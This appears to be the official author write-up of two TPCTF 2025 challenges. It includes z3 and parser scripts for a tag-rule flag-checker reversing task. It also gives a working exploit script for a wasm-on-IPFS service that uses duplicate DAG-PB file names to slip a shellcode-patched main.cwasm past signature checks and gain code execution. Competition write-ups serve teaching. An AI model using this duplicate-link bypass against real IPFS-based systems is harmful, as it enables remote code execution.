[Writeup] TPCTF 2025 官方部分题解

[Writeup] TPCTF 2025 官方部分题解

点击输入文字…

这次 TPCTF 出了两道题,Misc - ipvm 和 Rev - superbooru。题目难度个人认为是中等,superbooru 感觉会难一些。整体思路的话,是想把平时 CTF 里面少见的元素引入进来,给大家一些新的体验和灵感。大家有什么想法也可以和我交流。

赛后注:superbooru 全场 0ops 1 解,ipvm 无人解

superbooru

这个题灵感来自网络图床 booru。booru 是可以上传图片、给图片打标签的图床服务统称。这个题目设计了一个 很丑(我再也不用 tailwind 了) 的简单 booru,区别在于其可以静态配置标签规则,省去了需要手动打过多标签的麻烦。规则形如 condition -> consequence;其 EBNF 表达式如下:

1
2
3
4
5
6
7
8
9
10
TAG = /\\w+/
ATOM = TAG | GROUP | NEG
GROUP = "(" CONDITION ")"
NEG = "-" ATOM

OR_TERM = ATOM ("/" ATOM)+
AND_TERM = OR_TERM ("," OR_TERM)+

CONDITION = ATOM | OR_TERM | AND_TERM
CONSEQUENCE = (NEG? TAG) ("," (NEG? TAG))*

如下为合法的规则:

  • dog, male -> male_with_dog, -pet_only:意为,当标签中存在 dogmale,则自动添加标签 male_with_dog,且删除标签 pet_only
  • (dog / cat), -male -> pet_only, animal_only:意为,当标签中存在 dogcat 且不存在 male,则…

嗯看上去不错!然后我们点击打开题目下发的 implications.txt

嘟嘟哒嘟嘟哒

睁大眼睛看,小写 i 和 Ukrainian і 是不一样的(灵感来自某 LA CTF 🤮)。也就是说题目用这种规则实现了一个 flag checker,输入即为开头的 flag_bin_xx,正确输出为 flag_correct。现在我们要逆向这坨东西。(谁,我吗?)

如果 consequence 没有 -,那世界将是美好的,赞美上帝!只需要用 z3,把标签定义为其 implications 的或集,求解约束 flag_correct 即可。嗯可恶的就是这个 -。怎么标签加上了还能抹掉呢?

我们看代码,具体实现是一轮一轮的,每一轮会检查有哪些 rules 被 apply,在当前轮结束时统一更新标签。我们多执行几次 flag check,发现一个有意思的点,最后结束的轮次是几乎固定的(2476 轮左右),这引导我们思考这些 rules 是否是一套固定的逻辑。此外好心的出题人在代码里提了一嘴:

1
2
# It's guaranteed that the same implication applied
# multiple times will not change the result

也就是说同一条规则最多应用一次,就算会多次应用也不会改变结果。实际上,如果去记录这些规则具体是在哪一轮应用的,会发现基本上是固定的。我们有一个大致的猜测,这些规则分成了很多层,每一层中的规则,要么不被应用,要么和本层其他规则在同一轮应用。

可是具体规则是怎么做到让这些规则分层的呢?实际上比赛后半放出的 hint 也提示到,由最初的 check_flag 标签开始,会有一条形如 check_flag -> -check_flag, new_flag1new_flag1 -> -new_flag1, new_flag2…… 的链。对于第 n 层规则,我们额外加上 new_flag{n} 的条件,就会做到让这些规则分层。

这样之后,我们先写一个脚本,把原题目中的表达式化简,去除一些没用到的用于混淆的标签。代码如下:

sol.py >folded
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
from tqdm import tqdm

SPECIAL_CHARS = "(),/-"

name_map = {}


class Token:
def __init__(self, value):
self.value = value

def __eq__(self, other):
return isinstance(other, Token) and self.value == other.value

def __repr__(self):
return f"Token({self.value!r})"


class Lexer:
def __init__(self, text: str):
self.text = text
self.pos = 0

def __iter__(self):
return self

def char(self):
if self.pos >= len(self.text):
raise StopIteration
return self.text[self.pos]

def __next__(self):
while self.char().isspace():
self.pos += 1

ch = self.char()
if ch in SPECIAL_CHARS:
self.pos += 1
return Token(ch)

start = self.pos
while not (ch.isspace() or ch in SPECIAL_CHARS):
self.pos += 1
if self.pos >= len(self.text):
break
ch = self.char()

return self.text[start : self.pos]


class Query:
def __and__(self, other):
return Group("and", [self, other])

def __or__(self, other):
return Group("or", [self, other])

def __invert__(self):
if isinstance(self, Neg):
return self.query
return Neg(self)

def unwrap(self, type):
return [self]

def simplify(self):
pass


class Tag(Query):
def __init__(self, tag: str):
self.tag = tag

def __str__(self):
if self.tag in name_map:
return name_map[self.tag]
return self.tag

def __eq__(self, other):
return isinstance(other, Tag) and self.tag == other.tag

def __hash__(self):
return hash(self.tag)

def simplify(self):
return self

def tags(self):
yield self.tag


class Neg(Query):
def __init__(self, query: Query):
self.query = query

def __str__(self):
return f"-{self.query}"

def __eq__(self, other):
return isinstance(other, Neg) and self.query == other.query

def __hash__(self):
return hash(self.query)

def simplify(self):
if isinstance(self.query, Neg):
return self.query.query.simplify()
return ~self.query.simplify()

def tags(self):
return self.query.tags()


class Group(Query):
def __init__(self, type: str, queries: list[Query]):
self.type = type
self.queries = queries

def __str__(self):
assert self.queries
sep = ", " if self.type == "and" else " / "
return f"({sep.join(map(str, self.queries))})"

def unwrap(self, type):
if self.type == type:
result = []
for query in self.queries:
result.extend(query.unwrap(type))
return result
return [self]

def __eq__(self, other):
return (
isinstance(other, Group)
and self.type == other.type
and self.queries == other.queries
)

def __hash__(self):
return hash((self.type, tuple(self.queries)))

def simplify(self):
negs = set()
queries = []
for query in self.queries:
for item in query.simplify().unwrap(self.type):
if isinstance(item, Group) and not item.queries:
assert item.type != self.type
return item
if item in negs:
return Group("and" if self.type == "or" else "or", [])
negs.add(~item)

queries.append(item)

if len(queries) == 1:
return queries[0]

return Group(self.type, queries)

def tags(self):
for query in self.queries:
yield from query.tags()


def take_atom(lexer):
token = next(lexer)
if token == Token("("):
return take_expr(lexer)
elif token == Token("-"):
return ~take_atom(lexer)
elif isinstance(token, str):
return Tag(token)
else:
raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
stack = [take_atom(lexer)]
while True:
try:
token = next(lexer)
except StopIteration:
break

if token == Token("/"):
value = take_atom(lexer)
stack[-1] = stack[-1] | value
elif token == Token(","):
stack.append(take_atom(lexer))
elif token == Token(")"):
break
else:
raise ValueError(f"Unexpected {token}")

return Group("and", stack)


def parse_query(query: str):
lexer = Lexer(query)
return take_expr(lexer)


class Implication:
def __init__(self, condition, consequence: list[str]):
self.condition = condition
self.consequence = consequence

def __str__(self):
cond = str(self.condition)
if cond.startswith("("):
cond = cond[1:-1]
cons = ", ".join(map(str, self.consequence))
return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
lhs, rhs = implication.split("->")
return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications.txt") as f:
imps = []
for i, line in enumerate(f):
line = line.strip()
if not line:
continue

imps.append(parse_implication(line))

imps = imps[6:]

for imp in tqdm(imps):
imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
for tag in imp.consequence:
if isinstance(tag, Tag):
who_implies.setdefault(tag.tag, []).append(i)
elif isinstance(tag, Neg):
who_implies_neg.setdefault(tag.query.tag, []).append(i)

used = set()
queue = ["flag_correct"]
head = 0
while head < len(queue):
cur = queue[head]
head += 1
for i in who_implies.get(cur, []):
imp = imps[i]
for tag in imp.condition.tags():
if tag not in used:
used.add(tag)
queue.append(tag)

all_tags = set()
for imp in imps:
all_tags.update(imp.condition.tags())
all_tags.update(Group("and", imp.consequence).tags())

unused = all_tags - used - {"hooray", "flag_correct"}
for imp in imps:
imp.consequence = [
tag
for tag in imp.consequence
if not (isinstance(tag, Tag) and tag.tag in unused)
and not (isinstance(tag, Neg) and tag.query.tag in unused)
]

with open("mapping.txt", "w") as f:
for name in used:
if not name.startswith("flag") and name != "check_flag":
name_map[name] = f"t{len(name_map)}"
print(f"{name_map[name]} = {name}", file=f)

with open("implications_new.txt", "w") as f:
for imp in imps:
print(imp, file=f)

之后,再在这个长得能看些的等价的 implications_new.txt 上面,提取出 check_flag 的链(记为 pc 链)。在这样的分层结构上,我们可以把 consequence 的标签附加上层的信息。例如

1
2
3
4
5
6
7
8
9
10
11
check_flag -> -check_flag, new_flag1
new_flag1, a -> c
new_flag1, -a -> -c

new_flag1 -> -new_flag1, new_flag2
new_flag2, b -> a
new_flag2, -b -> -a

new_flag2 -> -new_flag2, new_flag3
new_flag3, c -> b
new_flag3, -c -> -b

这几行规则,相当于三行代码,依次执行了 c = a, a = b, b = c;给标签附加上层的信息后:

1
2
3
a1 = a0, b1 = b0, c1 = a0
a2 = b1, b2 = b1, c2 = c1
a3 = a2, b3 = c2, c3 = c2

转换为这样后,我们就可以建模了。为了避免最后的模型过于复杂,我们只保留每一轮发生了变化的标签(例如,上面的 a1, b1, b2, c2, a3, c3 会被舍弃),最后就可以直接用 z3 求解了。在此基础上,还可以用 z3 验证解是唯一的。

sol2.py >folded
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
from tqdm import tqdm
from z3 import Solver, Bool, BoolVal, And, Or, sat, is_true, unsat

SPECIAL_CHARS = "(),/-"

cur_pc = None


def format_z3(pc, tag):
return Bool(f"{pc}_{tag}")


class Token:
def __init__(self, value):
self.value = value

def __eq__(self, other):
return isinstance(other, Token) and self.value == other.value

def __repr__(self):
return f"Token({self.value!r})"


class Lexer:
def __init__(self, text: str):
self.text = text
self.pos = 0

def __iter__(self):
return self

def char(self):
if self.pos >= len(self.text):
raise StopIteration
return self.text[self.pos]

def __next__(self):
while self.char().isspace():
self.pos += 1

ch = self.char()
if ch in SPECIAL_CHARS:
self.pos += 1
return Token(ch)

start = self.pos
while not (ch.isspace() or ch in SPECIAL_CHARS):
self.pos += 1
if self.pos >= len(self.text):
break
ch = self.char()

return self.text[start : self.pos]


class Query:
def __and__(self, other):
return Group("and", [self, other])

def __or__(self, other):
return Group("or", [self, other])

def __invert__(self):
if isinstance(self, Neg):
return self.query
return Neg(self)

def unwrap(self, type):
return [self]

def simplify(self):
pass


class Tag(Query):
def __init__(self, tag: str):
self.tag = tag

def __str__(self):
return self.tag

def __eq__(self, other):
return isinstance(other, Tag) and self.tag == other.tag

def __hash__(self):
return hash(self.tag)

def simplify(self):
return self

def tags(self):
yield self.tag

def to_z3(self):
assert cur_pc is not None
if self.tag in pc_order:
return BoolVal(True)
if self.tag.startswith("flag_bin_") or self.tag == "check_flag":
return Bool(self.tag)

for i in reversed(tag_pcs.get(self.tag, [])):
if i < cur_pc:
return format_z3(i, self.tag)

return BoolVal(False)


class Neg(Query):
def __init__(self, query: Query):
self.query = query

def __str__(self):
return f"-{self.query}"

def __eq__(self, other):
return isinstance(other, Neg) and self.query == other.query

def __hash__(self):
return hash(self.query)

def simplify(self):
if isinstance(self.query, Neg):
return self.query.query.simplify()
return ~self.query.simplify()

def tags(self):
return self.query.tags()

def to_z3(self):
return ~self.query.to_z3()


class Group(Query):
def __init__(self, type: str, queries: list[Query]):
self.type = type
self.queries = queries

def __str__(self):
assert self.queries
sep = ", " if self.type == "and" else " / "
return f"({sep.join(map(str, self.queries))})"

def unwrap(self, type):
if self.type == type:
result = []
for query in self.queries:
result.extend(query.unwrap(type))
return result
return [self]

def __eq__(self, other):
return (
isinstance(other, Group)
and self.type == other.type
and self.queries == other.queries
)

def __hash__(self):
return hash((self.type, tuple(self.queries)))

def simplify(self):
negs = set()
queries = []
for query in self.queries:
for item in query.simplify().unwrap(self.type):
if isinstance(item, Group) and not item.queries:
assert item.type != self.type
return item
if item in negs:
return Group("and" if self.type == "or" else "or", [])
negs.add(~item)

queries.append(item)

if len(queries) == 1:
return queries[0]

return Group(self.type, queries)

def tags(self):
for query in self.queries:
yield from query.tags()

def to_z3(self):
queries = [query.to_z3() for query in self.queries]
return And(queries) if self.type == "and" else Or(queries)


def take_atom(lexer):
token = next(lexer)
if token == Token("("):
return take_expr(lexer)
elif token == Token("-"):
return ~take_atom(lexer)
elif isinstance(token, str):
return Tag(token)
else:
raise ValueError(f"Unexpected {token}")


def take_expr(lexer):
stack = [take_atom(lexer)]
while True:
try:
token = next(lexer)
except StopIteration:
break

if token == Token("/"):
value = take_atom(lexer)
stack[-1] = stack[-1] | value
elif token == Token(","):
stack.append(take_atom(lexer))
elif token == Token(")"):
break
else:
raise ValueError(f"Unexpected {token}")

return Group("and", stack)


def parse_query(query: str):
lexer = Lexer(query)
return take_expr(lexer)


class Implication:
def __init__(self, condition, consequence: list[str]):
self.condition = condition
self.consequence = consequence

def __str__(self):
cond = str(self.condition)
if cond.startswith("("):
cond = cond[1:-1]
cons = ", ".join(map(str, self.consequence))
return f"{cond} -> {cons}"


def parse_implication(implication: str) -> Implication:
lhs, rhs = implication.split("->")
return Implication(parse_query(lhs), parse_query(rhs).unwrap("and"))


with open("implications_new.txt") as f:
imps = []
for i, line in enumerate(f):
line = line.strip()
if not line:
continue

imps.append(parse_implication(line))

for imp in tqdm(imps):
imp.condition = imp.condition.simplify()

who_implies = {}
who_implies_neg = {}
for i, imp in enumerate(imps):
for tag in imp.consequence:
if isinstance(tag, Tag):
who_implies.setdefault(tag.tag, []).append(i)
elif isinstance(tag, Neg):
who_implies_neg.setdefault(tag.query.tag, []).append(i)

pcs = ["check_flag"]
while True:
pc = pcs[-1]
if pc not in who_implies_neg:
break
assert len(who_implies_neg[pc]) == 1
imp = imps[who_implies_neg[pc][0]]
assert len(imp.consequence) == 2
other = (
imp.consequence[0]
if isinstance(imp.consequence[1], Neg)
else imp.consequence[0]
)
assert isinstance(other, Tag)
pcs.append(other.tag)

print(len(pcs))

pc_order = {pc: i for i, pc in enumerate(pcs)}

important_imps = []
tag_pcs = {}
for imp in tqdm(imps):
if isinstance(imp.condition, Tag) and imp.condition.tag in pcs:
continue
assert len(imp.consequence) == 1
tag = imp.consequence[0]
if isinstance(tag, Neg):
continue

tag = tag.tag
if tag == "hooray":
continue

pc = None
for t in imp.condition.tags():
if t in pc_order:
assert pc is None
pc = t

assert pc
pc = pc_order[pc]
imp.pc = pc
important_imps.append(imp)
tag_pcs.setdefault(tag, []).append(pc)

for pcs in tag_pcs.values():
pcs.sort()

defs = {}

solver = Solver()
for imp in tqdm(important_imps):
tag = imp.consequence[0].tag
pc = imp.pc

cur_pc = pc

key = (pc, tag)
val = defs.setdefault(key, BoolVal(False))
defs[key] = val | imp.condition.to_z3()

for (pc, tag), val in defs.items():
solver.add(format_z3(pc, tag) == val)

pcs = tag_pcs["flag_correct"]
assert len(pcs) == 1
solver.add(format_z3(pcs[0], "flag_correct"))

assert solver.check() == sat
model = solver.model()

ors = []

bits = []
flags = set()
for i in range(256):
fl = f"flag_bin_{i:02x}"
bits.append("01"[int(is_true(model[Bool(fl)]))])
ors.append(Bool(fl) != is_true(model[Bool(fl)]))
if is_true(model[Bool(fl)]):
flags.add(fl)

solver.add(Or(*ors))
assert solver.check() == unsat

print(flags)

chs = []
for i in range(32):
bs = bits[i * 8 : (i + 1) * 8]
chs.append(chr(int("".join(reversed(bs)), 2)))

print("".join(chs))

代码看着很长,但大部分是重复的表达式解析部分。完整跑完一次 exp 大概需要一分钟,还在可以接受的范围内吧。

猜猜是谁写 exp 比出题时间长。

ipvm

这个题基于 IPFS,一种去中心化的文件存储协议。IPFS 本质上是把一份数据拆成很多块,每一块按哈希值唯一标识,最后这份数据也会由哈希值标识(其所有子块的哈希值拼接再哈希,见 Merkle Tree),称为 CID;之后这些块会被分发到 P2P 网络上。理想情况下,你只需要有一份数据或文件的 CID,就可以从网络上递归下载到这个文件的所有子块。听上去很酷!但实际上 P2P 在现实中远没有想象中那么好用;此外 IPFS 也有多种设计上的缺陷,详见 How IPFS is broken——虽然这么说,现在 IPFS 似乎还颇有些人在用,仁者见仁智者见智吧。

回到题目上来。题目基于 IPFS 做了一个神秘的 wasm 运行平台。通过 CID 上传文件,你可以:

  • build:上传一个含 wat / wasm 的文件夹(是的,IPFS 支持文件夹),服务器将其优化编译后 签名 并返回编译后的 package CID
  • run:上传一个 package CID,服务器验证签名后运行

对,似乎就这么简单。这能有什么漏洞吗?

我们知道,wasm 的运行过程一般是先 AOT 编译再本地运行。这里 buildrun 是把这个过程拆开了,这里就可能会 RCE,因为 build 出来的东西完全就是本地代码,如果我们能控制 run 的输入,就可以为所欲为了。不过这个签名很烦人。如果不是正常 build 出来的东西,是没法过签名验证的。wasmtime 这个运行环境以安全著称,我们很难从 wasm 出发去干出一些 0day RCE。怎么办呢?

如果你观察足够细致的话,会发现题目在读取文件夹中文件时有一些不一致的地方。第一种是 ipfs_read,这个函数会直接调用 ipfs cat <path> 来打印文件内容。这里的 path,既可以是 CID 本身(当然这要求 CID 对应文件而非文件夹),也可以是 CID 的子文件路径(例如 CID/config.json);第二种是,新建一个临时文件夹,然后用 ipfs get <CID> 将 CID 中的所有文件下载到这个临时文件夹中。

分别使用这两种方法,看似是无意之举,实际上是有意为之。我们调查后不难发现,IPFS 记录文件夹块使用的是 DAG-PB 格式。其 protobuf 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
message PBLink {
// binary CID (with no multibase prefix) of the target object
optional bytes Hash = 1;

// UTF-8 string name
optional string Name = 2;

// cumulative size of target object
optional uint64 Tsize = 3;
}

message PBNode {
// refs to other objects
repeated PBLink Links = 2;

// opaque user data
optional bytes Data = 1;
}

看到这里我们不难萌生一个邪恶的想法,如果一个 PBNode 中有多个名字相同的 PBLink(对应文件夹中多个同名文件)会发生什么?稍加测试便会发现,ipfs cat 会返回第一个文件的内容,而 ipfs get 会依次写入所有文件,自然导致文件是最后一个文件的内容。有了这里的不一致性,我们便可以向 build 出的 package 中恶意追加一个 main.cwasm,在签名验证时由于使用 ipfs cat 会正常通过,而在 ipfs get 下载并执行时就会执行我们恶意的 main.cwasm。这样就可以实现 RCE 了。

关于 main.cwasm 的构造,我是直接用 IDA patch 了一个编译好的 main.cwasm,往函数执行部分塞了段 shellcode。

注:使用 protoc dag.proto --python_out . 编译 protobuf

exp.cwasm

dag.proto >folded
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
syntax = "proto3";

message PBLink {
// binary CID (with no multibase prefix) of the target object
optional bytes Hash = 1;

// UTF-8 string name
optional string Name = 2;

// cumulative size of target object
optional uint64 Tsize = 3;
}

message PBNode {
// refs to other objects
repeated PBLink Links = 2;

// opaque user data
optional bytes Data = 1;
}
build/config.json >folded
1
2
3
4
{
"name": "test",
"entrypoint": "add"
}
build/main.wat >folded
1
2
3
4
5
(module
(func $add (export "add") (param $a i32) (param $b i32) (result i32)
(i32.add (local.get $a) (local.get $b))
)
)
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from dag_pb2 import *
from base58 import b58decode
import subprocess as sp
import requests as rq


ip, port = '127.0.0.1 8000'.split()
base = f"http://{ip}:{port}"
ipfs = ["ipfs", "--api", f"/ip4/{ip}/tcp/{port}"]


def add(path):
output = sp.check_output(ipfs + ["add", "-r", path]).decode().strip()
line = output.splitlines()[-1]
return line.split()[1]


built = rq.post(f"{base}/build", json={"cid": add("build")}).json()
output = sp.check_output(ipfs + ["block", "get", built["cid"]])

node = PBNode()
node.ParseFromString(output)

exp = add("exp.cwasm")
node.Links.insert(2, PBLink(Hash=b58decode(exp), Name="main.cwasm", Tsize=13483))

p = sp.Popen(ipfs + ["block", "put", "--format=v0"], stdin=sp.PIPE, stdout=sp.PIPE)
p.stdin.write(node.SerializeToString())
p.stdin.close()
modified = p.stdout.read().decode().strip()

output = rq.post(f"{base}/run", json={"cid": modified, "args": "1"}).json()
print(output)

题后注:实际上这题的漏洞并不复杂,题目中包含的 wat2wasm 完全是干扰项(出题人怕题目的漏洞点太一眼了),不过似乎干扰效果过头了(被打)。

[Writeup] TPCTF 2025 官方部分题解

https://mivik.moe/2025/solution/tpctf-2025/

作者

Mivik

发布于

2025-03-09

更新于

2025-03-10

许可协议

评论